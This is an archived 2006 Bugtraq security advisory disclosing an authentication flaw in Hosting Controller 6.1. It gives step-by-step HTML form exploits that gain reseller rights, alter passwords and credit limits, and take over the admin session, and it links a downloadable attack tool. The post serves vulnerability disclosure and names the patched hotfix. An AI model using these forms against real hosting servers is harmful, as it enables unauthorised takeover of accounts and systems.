[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
HostingController: An attacker can gain reseller privileges and after that can gain admin privileges
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: HostingController: An attacker can gain reseller privileges and after that can gain admin privileges
- From: Irsdl@xxxxxxxxx
- Date: 7 Jul 2006 15:31:51 -0000
Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I publish the most
important bugs of hosting controller program, after 3 weeks from reporting to
the main company (for more security)
Title: An attacker can gain reseller privileges and after that can gain admin
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
URL: <input type="text" name=siteact size=70>
<form name="frm1" method="post" onsubmit="return siteaction()">
<td><input type="text" name="reseller" value="hcadmin"></td>
<td><input type="text" name="loginname" value="hcadmin"></td>
<td><input type="text" name="Password" value=""></td>
<td><input type="text" name="first_name" value=""></td>
<td><input type="text" name="first_name" value=""></td>
<td><input type="text" name="last_name" value=""></td>
<td><input type="text" name="address" value=""></td>
<td><input type="text" name="city" value=""></td>
<td><input type="text" name="state" value=""></td>
<td><input type="text" name="country" value=""></td>
<td><input type="text" name="email" value=""></td>
<td><input type="text" name="phone" value=""></td>
<td><input type="text" name="fax" value=""></td>
<td><input type="text" name="zip" value=""></td>
<td><input type="text" name="selMonth" value=""></td>
<td><input type="text" name="selYear" value=""></td>
<td><input type="text" name="txtcardno" value=""></td>
<br><input type="submit">
2- This code list all of resellers then you must change a password of one of
them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every
<td><input type="text" name="UserName" value="hcadmin"></td>
<td><input type="text" name="Description" value=""></td>
<td><input type="text" name="FullName" value=""></td>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
<td><input type="text" name="UserChangePassword" value=""></td>
<td><input type="text" name="PassCheck" value="0"></td>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
<td><input type="text" name="CreditLimit" value="99999"></td>
<br><input type="submit">
3- Now you must login by a resseler that changed password from last step. now
goto userlist, if there is a user that will enough and if no user available, u
must make it!
now select it and click Enter to enter by that user. now the bug will be
each reseller can gain every user session even "HCADMIN" by bug in
below code will help you:
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<td><input type="text" name="AdName" value="hcadmin"></td>
<br><input type="submit">
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs
by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password:
grayhatz.net] (HC automation hacking program source code by simple VB)